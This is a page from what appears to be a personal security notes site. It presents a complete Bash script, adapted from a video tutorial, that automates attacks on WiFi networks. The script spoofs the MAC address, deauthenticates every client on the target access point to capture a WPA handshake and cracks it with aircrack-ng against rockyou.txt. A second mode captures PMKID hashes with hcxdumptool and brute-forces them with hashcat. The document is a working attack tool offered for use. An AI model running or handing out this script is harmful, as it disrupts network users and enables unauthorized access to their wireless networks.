T
T
TODO•SEC
Search…
wip-W1nn13PwnWifi.sh
This is a tool written in Bash by s4vitar (wifiCrack). I've followed along his video tutorial, modified the tool to work with my wireless cards, translated it to english, will fork in the future.
1
#!/bin/bash
2
3
# Author: s4vitar - Bash scripting tutorial https://github.com/s4vitar/wifiCrack/blob/master/s4viPwnWifi.sh
4
5
#Colours avaialable to format text strings
6
greenColour="\e[0;32m\033[1m"
7
endColour="\033[0m\e[0m"
8
redColour="\e[0;31m\033[1m"
9
blueColour="\e[0;34m\033[1m"
10
yellowColour="\e[0;33m\033[1m"
11
purpleColour="\e[0;35m\033[1m"
12
turquoiseColour="\e[0;36m\033[1m"
13
grayColour="\e[0;37m\033[1m"
14
15
# Usage of colours: String "\n optional line jump, ${green-gray+Colour} green-gray text ${endColour}"
16
17
export DEBIAN_FRONTEND=noninteractive # Allows for the unattended installation of dependencies components l.39
18
19
trap ctrl_c INT
20
21
function ctrl_c(){ # when ctrl + c is pressed this function is ran, reverts the NIC to its normal state
22
echo -e "\n${yellowColour}[*]${endColour}${grayColour} Closing...${endColour}"
23
echo -e "\n${yellowColour}[*]${endColour}${grayColour} Stopping Monitor mode on $networkCard {endColour}"
24
tput cnorm; airmon-ng stop wlan0mon # if you wanted to redirect output to a "blackhole" uncomment: #> /dev/null 2>&1
25
rm Captura* #2>/dev/null # ref line .22 # removes capture files
26
exit 0 # exits without errors
27
}
28
29
function helpPanel(){ # the goal of this function is to assist the user with using the application
30
echo -e "\n${yellowColour}[*]${endColour}${grayColour} Usage: ./W1nn13PwnWifi.sh${endColour}"
31
# -e argument enables backslash escaping. backslash + n prompts a new line and + t inserts tab.
32
echo -e "\n\t${purpleColour}a)${endColour}${yellowColour} Attack Modes:${endColour}"
33
echo -e "\t\t${redColour}Handshake${endColour}"
34
echo -e "\t\t${redColour}PKMID${endColour}"
35
echo -e "\t${purpleColour}n)${endColour}${yellowColour} Nombre de la tarjeta de red${endColour}"
36
echo -e "\t${purpleColour}h)${endColour}${yellowColour} Mostrar este panel de ayuda${endColour}\n"
37
exit 0
38
}
39
40
function dependencies(){ #Validates that all required programs for the script to run are installed
41
# tput civis - toggle cursor blinker
42
tput civis
43
clear; dependencies=(aircrack-ng macchanger) # clears screen and defines a variable with tuple containing name of the required packages
44
45
echo -e "${yellowColour}[*]${endColour}${grayColour} Comprobando programas necesarios...${endColour}"
46
sleep 2
47
48
for program in "${dependencies[@]}"; do
49
echo -ne "\n${yellowColour}[*]${endColour}${blueColour} Herramienta${endColour}${purpleColour} $program${endColour}${blueColour}...${endColour}"
50
51
test -f /usr/bin/$program
52
53
if [ "$(echo $?)" == "0" ]; then
54
echo -e " ${greenColour}(V)${endColour}"
55
else
56
echo -e " ${redColour}(X)${endColour}\n"
57
echo -e "${yellowColour}[*]${endColour}${grayColour} Instalando herramienta ${endColour}${blueColour}$program${endColour}${yellowColour}...${endColour}"
58
apt-get install $program -y > /dev/null 2>&1
59
apt-get install $program -y > /dev/null 2>&1 # instala iteracion del programa de la lista dependencies l.40 - cont
60
# redirige el output del programa hacia el /dev/null/; Finalmente, convierte el stdErr en stdIn 2>&1 - de esta manera
61
#es visible si ocurre algun error
62
fi; sleep 1
63
done
64
}
65
66
function startAttack(){
67
clear
68
echo -e "${yellowColour}[*]${endColour}${grayColour} Configurando tarjeta de red...${endColour}\n"
69
airmon-ng start $networkCard > /dev/null 2>&1
70
#ifconfig ${networkCard}mon down && macchanger -a ${networkCard}mon > /dev/null 2>&1
71
ifconfig wlan0mon down && macchanger -a wlan0mon > /dev/nul 2>&1
72
ifconfig wlan0mon up; killall dhclient wpa_supplicant 2>/dev/nul
73
74
echo -e "${yellowColour}[*]${endColour}${grayColour} Nueva direccion MAC asignada ${endColour}${purpleColour}[${endColour}${blueColour}$(macchanger -s wlan0mon | grep -i current | xargs | cut -d ' ' -f '3-100')${endColour}${purpleColour}]${endColour}"
75
76
if [ "$(echo $attack_mode)" == "Handshake" ]; then
77
78
xterm -hold -e "airodump-ng wlan0mon" &
79
airodump_xterm_PID=$!
80
echo -ne "\n${yellowColour}[*]${endColour}${grayColour} Nombre del punto de acceso: ${endColour}" && read apName
81
echo -ne "\n${yellowColour}[*]${endColour}${grayColour} Canal del punto de acceso: ${endColour}" && read apChannel
82
83
kill -9 $airodump_xterm_PID
84
wait $airodump_xterm_PID 2>/dev/null
85
86
xterm -hold -e "airodump-ng -c $apChannel -w Captura --essid $apName wlan0mon" &
87
airodump_filter_xterm_PID=$!
88
89
sleep 5; xterm -hold -e "aireplay-ng -0 10 -e $apName -c FF:FF:FF:FF:FF:FF wlan0mon" &
90
aireplay_xterm_PID=$!
91
sleep 10; kill -9 $aireplay_xterm_PID; wait $aireplay_xterm_PID 2>/dev/null
92
93
sleep 10; kill -9 $airodump_filter_xterm_PID
94
wait $airodump_filter_xterm_PID 2>/dev/null
95
96
xterm -hold -e "aircrack-ng -w /usr/share/wordlists/rockyou.txt Captura-01.cap" &
97
elif [ "$(echo $attack_mode)" == "PKMID" ]; then
98
clear; echo -e "${yellowColour}[*]${endColour}${grayColour} Iniciando ClientLess PKMID Attack...${endColour}\n"
99
sleep 2
100
timeout 60 bash -c "hcxdumptool -i wlan0mon --enable_status=1 -o Captura"
101
echo -e "\n\n${yellowColour}[*]${endColour}${grayColour} Obteniendo Hashes...${endColour}\n"
102
sleep 2
103
hcxpcaptool -z myHashes Captura; rm Captura 2>/dev/null
104
105
test -f myHashes
106
107
if [ "$(echo $?)" == "0" ]; then
108
echo -e "\n${yellowColour}[*]${endColour}${grayColour} Iniciando proceso de fuerza bruta...${endColour}\n"
109
sleep 2
110
111
hashcat -m 16800 /usr/share/wordlists/rockyou.txt myHashes -d 1 --force
112
else
113
echo -e "\n${redColour}[!]${endColour}${grayColour} No se ha podido capturar el paquete necesario...${endColour}\n"
114
rm Captura* 2>/dev/null
115
sleep 2
116
fi
117
else
118
echo -e "\n${redColour}[*] Este modo de ataque no es válido${endColour}\n"
119
fi
120
}
121
122
# Main Function
123
124
if [ "$(id -u)" == "0" ]; then
125
declare -i parameter_counter=0; while getopts ":a:n:h:" arg; do
126
case $arg in
127
a) attack_mode=$OPTARG ; let parameter_counter+=1;;
128
n) networkCard=$OPTARG ; let parameter_counter+=1;;
129
h) helpPanel;;
130
esac
131
done
132
133
if [ $parameter_counter -ne 2 ]; then
134
helpPanel
135
else
136
dependencies
137
startAttack
138
tput cnorm; airmon-ng stop wlan0mon > /dev/null 2>&1
139
fi
140
else
141
echo -e "\n${redColour}[*] No soy root${endColour}\n"
142
fi
Copied!
Last modified 8d ago
Copy link